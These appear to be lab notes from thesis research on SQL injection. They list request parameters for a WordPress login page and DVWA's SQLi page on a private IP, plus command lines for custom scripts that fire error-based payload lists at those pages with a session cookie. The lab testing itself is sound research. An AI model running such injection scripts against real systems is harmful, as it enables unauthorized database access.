Agenda:

- SQLI
  - Process:
    - Data Needed:
      - Post/Get ?
      - Parameters ?
      - Cookie ?

  - SQLmap vs Wordpress
    - /wordpress/wp-login.php
      - Post
      - Data Params:
        - log=admin
        - pwd=admin
        - wp-submit=Log+In
        - redirect_to=http://10.147.38.44/wordpress/wp-admin
        - testcookie=1
      - Cookie
        - None

      - /root/thesis/agenda/Thu-27-Feb-2020-11:44:13-PM-EST/wordpress_result.txt


Commands:

./sqli_500.sh http://10.147.38.44/wordpress/wp-login.php Generic_ErrorBased.txt "log=X&pwd=X" post out.txt "cookie=cookie"


cookie:
PHPSESSID=6h2dasdps0a9pflmt4jk11o9gh;security=low

./sqli_leak_normal.sh http://10.147.38.44/DVWA/vulnerabilities/sqli/ Generic_ErrorBased.txt "id=X&Submit=Submit" get dvwa_sqli_leak_normal.txt "PHPSESSID=6h2dasdps0a9pflmt4jk11o9gh;security=low"

dvwa/sqli (low) - char count = 4485


./sqli_leak_normal.sh http://10.147.38.44/DVWA/vulnerabilities/sqli Generic_ErrorBased_urlencoded.txt "id=X&Submit=Submit" get dvwa_sqli_leak_normal.txt 4485 "PHPSESSID=6h2dasdps0a9pflmt4jk11o9gh;security=low"
